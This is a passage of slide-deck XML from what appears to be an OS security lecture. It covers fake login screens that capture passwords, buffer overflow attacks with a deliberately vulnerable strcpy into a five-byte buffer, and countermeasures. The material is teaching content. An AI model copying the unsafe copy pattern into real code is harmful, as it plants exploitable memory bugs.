              <a:t>Intruder sets up phony login, walks away</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="469900" lvl="0" indent="-469900" algn="l" eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="bg2"/>
              </a:buClr>
              <a:buSzPct val="90000"/>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="]"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" kern="0" dirty="0" smtClean="0">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>User logs into phony screen</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="927100" lvl="1" indent="-469900" algn="l" eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="bg2"/>
              </a:buClr>
              <a:buSzPct val="90000"/>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="]"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" kern="0" dirty="0" smtClean="0">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>Phony screen records user name, password</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="927100" lvl="1" indent="-469900" algn="l" eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="bg2"/>
              </a:buClr>
              <a:buSzPct val="90000"/>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="]"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" kern="0" dirty="0" smtClean="0">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>Phony screen prints “login incorrect” and starts real screen</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="927100" lvl="1" indent="-469900" algn="l" eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="bg2"/>
              </a:buClr>
              <a:buSzPct val="90000"/>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="]"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" kern="0" dirty="0" smtClean="0">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>User retypes password, thinking there was an typing error</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="469900" lvl="0" indent="-469900" algn="l" eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="bg2"/>
              </a:buClr>
              <a:buSzPct val="90000"/>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="]"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" kern="0" dirty="0" smtClean="0">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>Solution: don’t allow certain characters to be “caught” by user programs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="927100" lvl="1" indent="-469900" algn="l" eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="bg2"/>
              </a:buClr>
              <a:buSzPct val="90000"/>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="]"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" kern="0" dirty="0" smtClean="0">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>The CTRL-ALT-DEL combination starts the login screen; cannot be bypassed.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="908050" marR="0" lvl="1" indent="-436563" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="base" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="accent2"/>
              </a:buClr>
              <a:buSzPct val="85000"/>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="S"/>
              <a:tabLst/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="3200" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:latin typeface="+mn-lt"/>
              <a:ea typeface="宋体" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="908050" marR="0" lvl="1" indent="-436563" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="base" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="accent2"/>
              </a:buClr>
              <a:buSzPct val="85000"/>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="S"/>
              <a:tabLst/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="3200" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:latin typeface="+mn-lt"/>
              <a:ea typeface="宋体" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Rectangle 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1771834" y="3844102"/>
            <a:ext cx="1962397" cy="400110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Real login screen</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Rectangle 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7521768" y="3765443"/>
            <a:ext cx="1494320" cy="707886"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Phony login </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>screen</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2194965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ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>Buffer Overflow</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Buffer overflow is a big source of bugs in operating systems</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>May appear in “trusted” daemons</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Exploited by modifying the stack to</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Return to a different address than that intended</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Include code that does something malicious</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Accomplished by writing past the end of a buffer on the stack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Slide Number Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{B9C31318-8D1F-46D0-AD3E-FD5CE0C4604B}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>21</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="9715480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buggy procedure</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1917700"/>
            <a:ext cx="8305800" cy="2202016"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Copies from its argument string </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>argv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>[]</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> to its local variable </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>buffer[5]</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> on the stack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>What if </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>argv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>[]</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>contains more than 5 chars?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{B9C31318-8D1F-46D0-AD3E-FD5CE0C4604B}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>22</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Rectangle 3"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2502003" y="3701917"/>
            <a:ext cx="3761145" cy="2472741"/>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gn="l">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pP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A(char </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>argv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>[])</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>{char buffer[5]; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>strcpy</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buffer,argv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>[1]);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>   return 0;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="469900" marR="0" lvl="0" indent="-469900" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="base" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="bg2"/>
              </a:buClr>
              <a:buSzPct val="90000"/>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="]"/>
              <a:tabLst/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="1400" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:ea typeface="宋体" charset="-122"/>
              <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="12097969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692C5C6B-4C09-4C02-B26B-F3DDBB5D5E4D}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:pPr/>
              <a:t>23</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23554" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>Buffer </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>Overflow Attack</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:ea typeface="宋体" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23555" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="314632" y="4660491"/>
            <a:ext cx="8577195" cy="1809136"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>(a) Situation when main program is running</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>(b) After </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" smtClean="0">
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>procedure </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" i="1" dirty="0" smtClean="0">
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>A()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" smtClean="0">
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>called</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>(c) Buffer overflow </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" smtClean="0">
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>alters the return address from A(). </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" smtClean="0">
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>Can be garbage that causes program crash, or can be address of a malicious program</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
              <a:ea typeface="宋体" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1026" name="Picture 2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="589935" y="2193822"/>
            <a:ext cx="7532124" cy="2277532"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2119539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ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>Buffer Overflow Attack</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:spcBef>
                <a:spcPct val="10000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>Technique exploited by many network attacks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="685800" lvl="1" indent="-228600">
              <a:spcBef>
                <a:spcPct val="10000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="–"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Anytime input comes from network request and is not checked for size</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:spcBef>
                <a:spcPct val="10000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>Counter-measures:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="685800" lvl="1" indent="-228600">
              <a:spcBef>
                <a:spcPct val="10000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="–"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Don’t code this way!  (ok, wishful thinking)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="685800" lvl="1" indent="-228600">
              <a:spcBef>
                <a:spcPct val="10000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="–"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>New mode bits in Intel, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>Amd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>, and Sun processors</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1143000" lvl="2" indent="-228600">
              <a:spcBef>
                <a:spcPct val="10000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="»"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Put in page table; says “don’t execute code in this page”</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Slide Number Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{B9C31318-8D1F-46D0-AD3E-FD5CE0C4604B}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>24</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="22335361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 Overflow Attack</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1917700"/>
            <a:ext cx="8305800" cy="4610919"/>
          </a:xfrm>
